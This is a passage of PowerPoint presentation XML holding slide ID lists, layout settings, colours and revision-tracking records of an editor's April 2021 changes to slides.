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4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId77"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId78"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="376" r:id="rId5"/>
    <p:sldId id="523" r:id="rId6"/>
    <p:sldId id="464" r:id="rId7"/>
    <p:sldId id="524" r:id="rId8"/>
    <p:sldId id="525" r:id="rId9"/>
    <p:sldId id="530" r:id="rId10"/>
    <p:sldId id="466" r:id="rId11"/>
    <p:sldId id="512" r:id="rId12"/>
    <p:sldId id="480" r:id="rId13"/>
    <p:sldId id="472" r:id="rId14"/>
    <p:sldId id="484" r:id="rId15"/>
    <p:sldId id="485" r:id="rId16"/>
    <p:sldId id="482" r:id="rId17"/>
    <p:sldId id="486" r:id="rId18"/>
    <p:sldId id="487" r:id="rId19"/>
    <p:sldId id="489" r:id="rId20"/>
    <p:sldId id="490" r:id="rId21"/>
    <p:sldId id="537" r:id="rId22"/>
    <p:sldId id="491" r:id="rId23"/>
    <p:sldId id="492" r:id="rId24"/>
    <p:sldId id="534" r:id="rId25"/>
    <p:sldId id="515" r:id="rId26"/>
    <p:sldId id="535" r:id="rId27"/>
    <p:sldId id="536" r:id="rId28"/>
    <p:sldId id="528" r:id="rId29"/>
    <p:sldId id="527" r:id="rId30"/>
    <p:sldId id="494" r:id="rId31"/>
    <p:sldId id="518" r:id="rId32"/>
    <p:sldId id="526" r:id="rId33"/>
    <p:sldId id="529" r:id="rId34"/>
    <p:sldId id="495" r:id="rId35"/>
    <p:sldId id="488" r:id="rId36"/>
    <p:sldId id="473" r:id="rId37"/>
    <p:sldId id="474" r:id="rId38"/>
    <p:sldId id="475" r:id="rId39"/>
    <p:sldId id="476" r:id="rId40"/>
    <p:sldId id="477" r:id="rId41"/>
    <p:sldId id="516" r:id="rId42"/>
    <p:sldId id="519" r:id="rId43"/>
    <p:sldId id="478" r:id="rId44"/>
    <p:sldId id="479" r:id="rId45"/>
    <p:sldId id="521" r:id="rId46"/>
    <p:sldId id="496" r:id="rId47"/>
    <p:sldId id="422" r:id="rId48"/>
    <p:sldId id="471" r:id="rId49"/>
    <p:sldId id="426" r:id="rId50"/>
    <p:sldId id="450" r:id="rId51"/>
    <p:sldId id="452" r:id="rId52"/>
    <p:sldId id="455" r:id="rId53"/>
    <p:sldId id="457" r:id="rId54"/>
    <p:sldId id="470" r:id="rId55"/>
    <p:sldId id="435" r:id="rId56"/>
    <p:sldId id="436" r:id="rId57"/>
    <p:sldId id="462" r:id="rId58"/>
    <p:sldId id="459" r:id="rId59"/>
    <p:sldId id="499" r:id="rId60"/>
    <p:sldId id="500" r:id="rId61"/>
    <p:sldId id="501" r:id="rId62"/>
    <p:sldId id="502" r:id="rId63"/>
    <p:sldId id="503" r:id="rId64"/>
    <p:sldId id="504" r:id="rId65"/>
    <p:sldId id="505" r:id="rId66"/>
    <p:sldId id="506" r:id="rId67"/>
    <p:sldId id="507" r:id="rId68"/>
    <p:sldId id="522" r:id="rId69"/>
    <p:sldId id="508" r:id="rId70"/>
    <p:sldId id="509" r:id="rId71"/>
    <p:sldId id="533" r:id="rId72"/>
    <p:sldId id="511" r:id="rId73"/>
    <p:sldId id="532" r:id="rId74"/>
    <p:sldId id="531" r:id="rId75"/>
    <p:sldId id="420" r:id="rId76"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6784975" cy="9856788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7">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="29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033CC"/>
    <a:srgbClr val="00CC00"/>
    <a:srgbClr val="800000"/>
    <a:srgbClr val="009900"/>
    <a:srgbClr val="CCECFF"/>
    <a:srgbClr val="CCFF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E21932-2C5E-492B-B0F7-9350DDE148B6}" v="74" dt="2021-04-27T22:29:38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67"/>
        <p:guide pos="291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ck Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}"/>
    <pc:docChg chg="custSel modSld">
      <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:48:24.939" v="232" actId="14100"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:52:03.429" v="15" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="521324744" sldId="473"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:51:51.770" v="11" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521324744" sldId="473"/>
            <ac:picMk id="2" creationId="{5261AB0D-6E73-43FD-8F13-9C81956EB8FD}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:52:03.429" v="15" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="521324744" sldId="473"/>
            <ac:picMk id="7" creationId="{AA3A4550-313F-472A-A18A-2B80581EFA0C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:55:22.013" v="19" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="418751111" sldId="474"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:55:22.013" v="19" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="418751111" sldId="474"/>
            <ac:picMk id="4" creationId="{355FCB87-92D5-4B31-90C2-AB9AAFB03A92}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:55:06.085" v="16" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="418751111" sldId="474"/>
            <ac:picMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:57:44.668" v="38" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4135486081" sldId="475"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:57:34.155" v="34" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4135486081" sldId="475"/>
            <ac:picMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:57:44.668" v="38" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4135486081" sldId="475"/>
            <ac:picMk id="6" creationId="{384865CC-1159-4F0D-97FF-113D14281306}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T02:05:45.387" v="46" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2683837705" sldId="476"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T02:05:45.387" v="46" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2683837705" sldId="476"/>
            <ac:spMk id="7" creationId="{A32EF23F-4473-4208-90B2-6922D0302A16}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:56:25.972" v="33" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2683837705" sldId="476"/>
            <ac:picMk id="4" creationId="{F10FB968-B8AD-4E0A-999D-D2E684620FF6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T02:22:50.736" v="87" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3301273890" sldId="479"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T02:13:39.357" v="81" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3301273890" sldId="479"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T02:22:50.736" v="87" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3301273890" sldId="479"/>
            <ac:spMk id="8" creationId="{C9DB9C18-82AD-412B-A426-2D432499D44F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T02:22:36.744" v="86" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3301273890" sldId="479"/>
            <ac:picMk id="2" creationId="{342C8CBD-277D-4503-9044-5BF9A4517309}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T02:22:50.736" v="87" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3301273890" sldId="479"/>
            <ac:picMk id="5" creationId="{58ACEB40-C89A-439A-9DEF-0A77A5F08D67}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:23:19.649" v="97" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2857511715" sldId="501"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:23:19.649" v="97" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2857511715" sldId="501"/>
            <ac:spMk id="2" creationId="{C623790D-666B-48BC-ABFB-261B287965BC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:22:08.306" v="92" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2857511715" sldId="501"/>
            <ac:picMk id="3" creationId="{0C761D20-505E-46E5-922B-8EFA5451FFD8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:23:57.945" v="100" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="106780491" sldId="502"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:23:57.945" v="100" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="106780491" sldId="502"/>
            <ac:spMk id="2" creationId="{214BC706-57DD-4D39-8A13-13C0721E81AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:23:40.894" v="98" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="106780491" sldId="502"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:24:16.009" v="102" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1471533244" sldId="504"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:24:16.009" v="102" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1471533244" sldId="504"/>
            <ac:spMk id="2" creationId="{505CF780-8C2B-4423-A0D1-28667F5ABC3B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:35:54.173" v="209" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3727228898" sldId="508"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:35:54.173" v="209" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3727228898" sldId="508"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:36:09.886" v="217" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1672479002" sldId="509"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:36:09.886" v="217" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1672479002" sldId="509"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:48:24.939" v="232" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2679931075" sldId="511"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:36:59.122" v="225" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2679931075" sldId="511"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:47:12.340" v="229" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2679931075" sldId="511"/>
            <ac:picMk id="3" creationId="{D1D02B7C-3072-44B6-8E68-BDF019B564C3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:48:24.939" v="232" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2679931075" sldId="511"/>
            <ac:picMk id="9" creationId="{301CDF6A-BAF5-47EE-AAD0-E59834688CCC}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T02:26:49.831" v="91" actId="255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3817710396" sldId="521"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T02:26:49.831" v="91" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3817710396" sldId="521"/>
            <ac:spMk id="6" creationId="{A285EF7E-3C54-48E7-8E40-BEBDF591B59F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:26:56.328" v="164" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1088575966" sldId="522"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T03:26:56.328" v="164" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1088575966" sldId="522"/>
            <ac:spMk id="2" creationId="{DC8294F4-9845-4251-8992-2CD7C76D488F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:35:51.940" v="10" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2238483800" sldId="526"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:35:49.278" v="9" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2238483800" sldId="526"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{EE38428C-6CC4-496C-8888-11D11C9E90A7}" dt="2021-04-24T01:35:51.940" v="10" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2238483800" sldId="526"/>
            <ac:picMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{7D0BC814-7C69-43B2-ADCC-4C026A7984EE}"/>
    <pc:docChg chg="custSel modSld">
      <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{7D0BC814-7C69-43B2-ADCC-4C026A7984EE}" dt="2021-04-24T04:08:45.921" v="159" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp mod modClrScheme chgLayout">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{7D0BC814-7C69-43B2-ADCC-4C026A7984EE}" dt="2021-04-24T04:02:08.821" v="151" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4119940298" sldId="531"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{7D0BC814-7C69-43B2-ADCC-4C026A7984EE}" dt="2021-04-24T03:51:02.586" v="0" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4119940298" sldId="531"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{7D0BC814-7C69-43B2-ADCC-4C026A7984EE}" dt="2021-04-24T04:02:08.821" v="151" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4119940298" sldId="531"/>
            <ac:spMk id="3" creationId="{01930435-7B91-42B7-A9A6-DC81B85A0BA5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{7D0BC814-7C69-43B2-ADCC-4C026A7984EE}" dt="2021-04-24T04:08:45.921" v="159" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1782402953" sldId="532"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{7D0BC814-7C69-43B2-ADCC-4C026A7984EE}" dt="2021-04-24T04:08:45.921" v="159" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1782402953" sldId="532"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{FD76C90A-6F1F-4A76-B51F-C3EDDD337E7E}"/>
    <pc:docChg chg="delSld modSld">
      <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{FD76C90A-6F1F-4A76-B51F-C3EDDD337E7E}" dt="2021-04-23T06:10:32.036" v="7" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="del">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{FD76C90A-6F1F-4A76-B51F-C3EDDD337E7E}" dt="2021-04-23T06:09:51.457" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="341697738" sldId="510"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{FD76C90A-6F1F-4A76-B51F-C3EDDD337E7E}" dt="2021-04-23T06:10:32.036" v="7" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2679931075" sldId="511"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Hock Guan TAN (NP)" userId="S::thg@np.edu.sg::e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="AD" clId="Web-{FD76C90A-6F1F-4A76-B51F-C3EDDD337E7E}" dt="2021-04-23T06:10:32.036" v="7" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2679931075" sldId="511"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Hock Guan TAN (NP)" userId="e5f7d661-fe1a-47b6-b277-f25b08fa15d4" providerId="ADAL" clId="{18EF79FC-DAEF-4DE5-8CA4-916783548EC1}"/>
    <pc:docChg chg="custSel modSld">
